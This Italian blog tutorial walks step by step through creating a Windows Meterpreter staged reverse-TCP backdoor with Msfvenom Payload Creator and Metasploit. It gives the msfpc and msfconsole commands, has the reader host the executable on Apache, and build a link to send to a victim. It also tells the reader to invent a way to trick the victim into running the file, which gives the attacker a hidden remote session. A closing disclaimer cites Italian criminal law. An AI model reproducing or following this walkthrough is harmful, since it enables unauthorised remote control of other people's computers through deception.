Ciao a tutti! Oggi torniamo a parlare del tema backdoor, più precisamente della windows-meterpreter-staged-reverse-tcp-443.exe, messa a disposizione da Msfvenom Payload Creator, tool normalmente incluso in Kali Linux.

Il tutorial sarà strutturato in egual modo rispetto ai precedenti articoli, proprio perchè i procedimenti si assomigliano e ciò che fa la differenza di volta in volta sono i tipi di backdoor che adoperiamo; ma ora, partiamo!

windows-meterpreter-staged-reverse-tcp-443.exe

Come primo procedimento apriamo la console di Msfvenom Payload Creator che troveremo nel percorso Applicazioni>Strumenti di exploiting>MPC; startata l’applicazione eseguiremo il primo comando, ovvero /usr/bin/msfpc verbose loop “tuo indirizzo ip”

 

 

 

 

 

 

Il quale, se già non l’hai fatto in precedenza, andrà a creare tutti i tipi di backdoor che ci potranno essere utili per gli attacchi con questo programma; ma nel nostro caso ce ne servirà solamente uno, ovvero la windows-meterpreter-staged-reverse-tcp-443.exe; ricordo che se non sapete come ricavare il vostro IP, necessario per il primo comando, potete visualizzrlo facilmente una volta digitato, su di un nuovo terminale, il comando ifconfig.

 

 

 

 

 

 

Ora, terminati i processi riguardanti il primo comando, possiamostartare Metasploit Framework, il quale si metterà automaticamente in ascolto, attendendo la captazione di dati che provengano dal dispositivo in cui proveremo a installare e avviare la nostra backdoor; per fare ciò andiamo a digitare il comando msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc’.

 

 

 

 

 

 

Ora, la vera sostanza della comandistica è terminata; dovremo andare nella cartella Home e cercare il file windows-meterpreter-staged-reverse-tcp-443.exe

 

 

 

 

 

 

 

Per poi trasferirlo nel percorso Computer>var>www>html

 

 

 

 

 

 

 

Fatto ciò andremo a digitare su di un nuovo terminale il comando service apache2 start.

 

 

 

 

 

 

La parte più difficile viene adesso; infatti dovremo creare un link da inviare alla vittima, la quale attiverà il download della backdoor sul dispositivo che vogliamo attaccare, per poi farla avviare e quindi farla comunicare con il terminale di metasploit in ascolto; il link deve avere la seguente struttura: “nostro indirizzo ip”/windows-meterpreter-staged-reverse-tcp-443.exe; ovviamente al posto di “nostro indirizzo ip” andremo ad inserire appunto l’ip che abbiamo ricavato precedentemente con il comando ifconfig.

 

 

 

 

 

 

 

 

Conclusione

Una volta che avrete inventato un modo per far cascare la vittima nella trappola e, quindi, siate riusciti a fare tutto ciò descritto prima, si stabilirà una connessione segreta tra il dispositivo sotto attacco e il nostro pc attaccante. Se, una volta entrati nel sistema remoto, riscontrate difficoltà con i comandi a disposizione , potete sempre digitare il comando “help” sullo stesso terminale di metasploit in ascolto, il quale vi fornirà tutto il supporto necessario.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Leggi anche il nostro articolo Ecco come sarà Apple iPhone 8.

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.